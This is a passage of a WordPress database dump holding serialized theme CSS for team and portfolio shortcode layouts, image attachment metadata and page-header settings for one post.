none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-30414b27d2baf5bcfb60c7974c11313c.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(23344,3486,'_wp_attached_file','2022/12/w26m3.jpg'),
(23345,3486,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:741;s:6:\"height\";i:494;s:4:\"file\";s:17:\"2022/12/w26m3.jpg\";s:8:\"filesize\";i:145252;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"w26m3-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19873;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"w26m3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8860;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:17:\"w26m3-500x333.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:333;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47435;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(23346,3452,'_wp_page_template','default'),
(23347,3452,'_dt_microsite_primary_menu',''),
(23348,3452,'_dt_microsite_split_left_menu',''),
(23349,3452,'_dt_microsite_split_right_menu',''),
(23350,3452,'_dt_microsite_mobile_menu',''),
(23351,3494,'_wp_attached_file','2022/12/w26m4.jpg'),
(23352,3494,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:209;s:6:\"height\";i:241;s:4:\"file\";s:17:\"2022/12/w26m4.jpg\";s:8:\"filesize\";i:11979;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"w26m4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5607;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(23353,3497,'_edit_lock','1675608521:1'),
(23354,3498,'_wp_attached_file','2023/01/w26m1.jpg'),
(23355,3498,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:991;s:6:\"height\";i:515;s:4:\"file\";s:17:\"2023/01/w26m1.jpg\";s:8:\"filesize\";i:41295;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"w26m1-300x156.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8210;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"w26m1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6644;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"w26m1-768x399.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:399;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30071;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:17:\"w26m1-500x260.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16848;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:17:\"w26m1-800x416.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:416;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31873;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(23356,3499,'_wp_attached_file','2023/01/w26m1-1.jpg'),
(23357,3499,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:664;s:6:\"height\";i:375;s:4:\"file\";s:19:\"2023/01/w26m1-1.jpg\";s:8:\"filesize\";i:109276;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"w26m1-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9314;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"w26m1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6603;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:19:\"w26m1-1-500x282.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:282;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19193;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(23358,3497,'_thumbnail_id','3499'),
(23359,3497,'_edit_last','1'),
(23360,3497,'_wpb_vc_js_status','true'),
(23361,3497,'_dt_sidebar_position','disabled'),
(23362,3497,'_dt_sidebar_widgetarea_id','sidebar_1'),
(23363,3497,'_dt_sidebar_hide_on_mobile','0'),
(23364,3497,'_dt_footer_show','1'),
(23365,3497,'_dt_footer_widgetarea_id','sidebar_2'),
(23366,3497,'_dt_footer_hide_on_mobile','0'),
(23367,3497,'_dt_header_title','fancy'),
(23368,3497,'_dt_header_background','normal'),
(23369,3497,'_dt_header_background_below_slideshow','disabled'),
(23370,3497,'_dt_header_transparent_bg_color_scheme','light'),
(23371,3497,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(23372,3497,'_dt_header_transparent_top_bar_bg_opacity','25'),
(23373,3497,'_dt_header_transparent_bg_color','#000000'),
(23374,3497,'_dt_header_transparent_bg_opacity','50'),
(23375,3497,'_dt_header_disabled_background','normal'),
(23376,3497,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(23377,3497,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(23378,3497,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(23379,3497,'_dt_header_disabled_transparent_bg_color','#000000'),
(23380,3497,'_dt_header_disabled_transparent_bg_opacity','50'),
(23381,3497,'_dt_page_overrides_top_margin',''),
(23382,3497,'_dt_page_overrides_right_margin',''),
(23383,3497,'_dt_page_overrides_bottom_margin',''),
(23384,3497,'_dt_page_overrides_left_margin',''),
(23385,3497,'_dt_mobile_page_padding_top',''),
(23386,3497,'_dt_mobile_page_padding_right',''),
(23387,3497,'_dt_mobile_page_padding_bottom',''),
(23388,3497,'_dt_mobile_page_padding_left',''),
(23389,3497,'_dt_fancy_header_layout_heading',''),
(23390,3497,'_dt_fancy_header_title_aligment','center'),
(23391,3497,'_dt_fancy_header_height','300'),
(23392,3497,'_dt_fancy_header_padding-top','0px'),
(23393,3497,'_dt_fancy_header_padding-bottom','0px'),
(23394,3497,'_dt_fancy_header_breadcrumbs_heading',''),
(23395,3497,'_dt_fancy_header_breadcrumbs','disabled'),
(23396,3497,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(23397,3497,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(23398,3497,'_dt_fancy_header_title_heading',''),
(23399,3497,'_dt_fancy_header_title_mode','custom'),
(23400,3497,'_dt_fancy_header_title',''),
(23401,3497,'_dt_fancy_header_title_font_size','30'),
(23402,3497,'_dt_fancy_header_title_line_height','36'),
(23403,3497,'_dt_fancy_header_text_transform','none'),
(23404,3497,'_dt_fancy_header_title_color_mode','color'),
(23405,3497,'_dt_fancy_header_title_color','#000000'),
(23406,3497,'_dt_fancy_header_subtitle_heading',''),
(23407,3497,'_dt_fancy_header_subtitle',''),
(23408,3497,'_dt_fancy_header_subtitle_font_size','18'),
(23409,3497,'_dt_fancy_header_subtitle_line_height','26'),
(23410,3497,'_dt_fancy_header_subtitle_text_transform','none'),
(23411,3497,'_dt_fancy_header_subtitle_color_mode','color'),
(23412,3497,'_dt_fancy_header_subtitle_color','#ffffff'),
(23413,3497,'_dt_fancy_header_bg_heading',''),
(23414,3497,'_dt_fancy_header_bg_color','#222222'),
(23415,3497,'_dt_fancy_header_bg_image_origin','featured_image'),
(23416,3497,'_dt_fancy_header_bg_image','a:0:{}'),
(23417,3497,'_dt_fancy_header_bg_repeat','no-repeat'),
(23418,3497,'_dt_fancy_header_bg_position_x','center'),
(23419,3497,'_dt_fancy_header_bg_position_y','center'),
(23420,3497,'_dt_fancy_header_bg_fullscreen','1'),
(23421,3497,'_dt_fancy_header_bg_overlay','0'),
(23422,3497,'_dt_fancy_header_overlay_color','#000'),
(23423,3497,'_dt_fancy_header_bg_overlay_opacity','50'),
(23424,3497,'_dt_fancy_header_scroll_effect','default'),
(23425,3497,'_dt_fancy_header_bg_parallax','0.5'),
(23426,3497,'_dt_fancy_header_responsiveness_heading',''),
(23427,3497,'_dt_fancy_header_responsiveness','disabled'),
(23428,3497,'_dt_fancy_header_responsiveness_switch','778px'),
(23429,3497,'_dt_fancy_header_responsive_height','70'),
(23430,3497,'_dt_fancy_header_responsive_font_size','30'),
(23431,3497,'_dt_fancy_header_responsive_title_line_height','38'),
